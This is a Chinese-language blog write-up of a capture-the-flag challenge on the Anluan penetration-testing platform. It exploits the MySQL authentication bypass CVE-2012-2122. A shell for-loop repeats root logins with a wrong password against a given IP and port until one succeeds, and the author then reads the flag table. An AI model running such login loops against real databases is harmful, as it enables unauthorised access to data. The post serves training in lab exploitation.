安鸾渗透实战平台——暴力破解(Mysql暴力破解 (200分)

漏洞环境

安鸾渗透实战平台——暴力破解(Mysql暴力破解)
kali虚拟机

分析题目

在这里插入图片描述
1、从图上作者告诉我们要使用MySQL漏洞,最开始没明白是什么意思,去拿MSF的mysql爆破模块去测试了一下,得到密码,拿去使用时出现了问题
在这里插入图片描述提示密码错误:
在这里插入图片描述

又试了几次发现每次爆破的密码都不一样
在这里插入图片描述
在这里插入图片描述

题目提示了,利用漏洞,以前有个MySQL的漏洞,这里直接使用linux的for循环去测试

Mysql 身份认证绕过漏洞(CVE-2012-2122)
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

for i in `seq 1 1000`; do mysql -uroot -paaaaa -h 118.190.133.35 -P3308 ; done

for : 利用linux的shell创造一个for循环
i : 循环的变量
seq 1 1000:表示循环是从1-1000
do:执行
mysql -uroot -paaaaa:mysql的登录命令,意思是用户名是root,密码是aaaaa
-h 118.190.133.35 -P3308:-h是IP ;-P是端口
done:表示循环结束

在这里插入图片描述

进去了,看一下表的信息,发现有个test
在这里插入图片描述
没有,看看whalwl把

use whalwl;
show tables;

在这里插入图片描述

select * from flag;

在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值